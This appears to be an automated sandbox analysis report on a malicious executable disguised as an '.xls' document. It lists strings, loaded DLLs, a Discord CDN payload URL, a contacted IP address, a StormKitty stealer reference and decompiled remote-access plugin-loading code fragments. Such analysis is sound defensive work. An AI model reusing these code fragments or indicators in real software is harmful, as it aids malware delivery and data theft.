Source: |
Binary string: C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbeTOT source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr |
Source: |
Binary string: mscorlib.pdbq source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdbRSDS# source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Numerics.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: HSDSDF32.pdbh source: rDoc5633276235623657_xls.exe |
Source: |
Binary string: System.Transactions.ni.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbH source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.ni.pdbRSDSJ< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr |
Source: |
Binary string: \??\C:\Windows\RegAsm.pdbp( source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.pdb8< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Configuration.ni.pdbRSDScUN source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Runtime.Serialization.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\RegAsm.pdb0(G source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Xml.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdbL} source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb< source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: Microsoft.VisualBasic.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: HSDSDF32.pdb source: rDoc5633276235623657_xls.exe |
Source: |
Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n0C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Configuration.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\exe\RegAsm.pdba source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Data.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Configuration.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Xml.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: o.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Numerics.ni.pdbRSDSautg source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: %%.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Windows.Forms.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp, WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbhk@ source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Drawing.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Management.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Xml.pdb@DHLPhl source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Data.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Management.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Transactions.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: \??\C:\Windows\exe\RegAsm.pdbE source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: symbols\dll\mscorlib.pdbLb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp |
Source: |
Binary string: System.Runtime.Serialization.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.pdbxm. source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Transactions.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Numerics.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Windows.Forms.pdbDN. source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.ni.pdb source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Data.pdb, source: WER8A2C.tmp.dmp.9.dr |
Source: |
Binary string: System.Core.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr |
Source: unknown |
TCP traffic detected without corresponding DNS query: 178.215.236.218 |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cdn.discordapp.com |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D63000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cdn.discordapp.comd |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://james.newtonking.com/projects/json |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: Amcache.hve.9.dr |
String found in binary or memory: http://upx.sf.net |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1784666277.0000000002D56000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.discordapp.com |
Source: rDoc5633276235623657_xls.exe |
String found in binary or memory: https://cdn.discordapp.com/attachments/1288648799220400244/1288791621017669705/xxxxxxxxxxx.txt?ex=66 |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: RegAsm.exe, 00000002.00000002.2654703990.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/LimerBoy/StormKitty |
Source: places.raw.2.dr |
String found in binary or memory: https://support.mozilla.org |
Source: places.raw.2.dr |
String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br |
Source: places.raw.2.dr |
String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E16000.00000004.00000800.00020000.00000000.sdmp, tmp1CF0.tmp.dat.2.dr |
String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_see |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_seeaCould |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: RegAsm.exe, 00000002.00000002.2656518468.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, tmpA7EC.tmp.dat.2.dr, tmp1D00.tmp.dat.2.dr |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2 |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR |
Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox |
Source: places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig |
Source: RegAsm.exe, 00000002.00000002.2656518468.00000000041B5000.00000004.00000800.00020000.00000000.sdmp, tmp743.tmp.dat.2.dr, places.raw.2.dr |
String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www. |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.newtonsoft.com/jsonschema |
Source: RegAsm.exe, 00000002.00000002.2660991014.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: aclayers.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: sxs.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: scrrun.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: linkinfo.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ntshrui.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: cscapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: vaultcli.dll |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Section loaded: wintypes.dll |
Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs |
.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777255)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777256)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777253))}) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Source: rDoc5633276235623657_xls.exe, 00000000.00000002.1783472169.00000000010E6000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll? |
Source: Amcache.hve.9.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |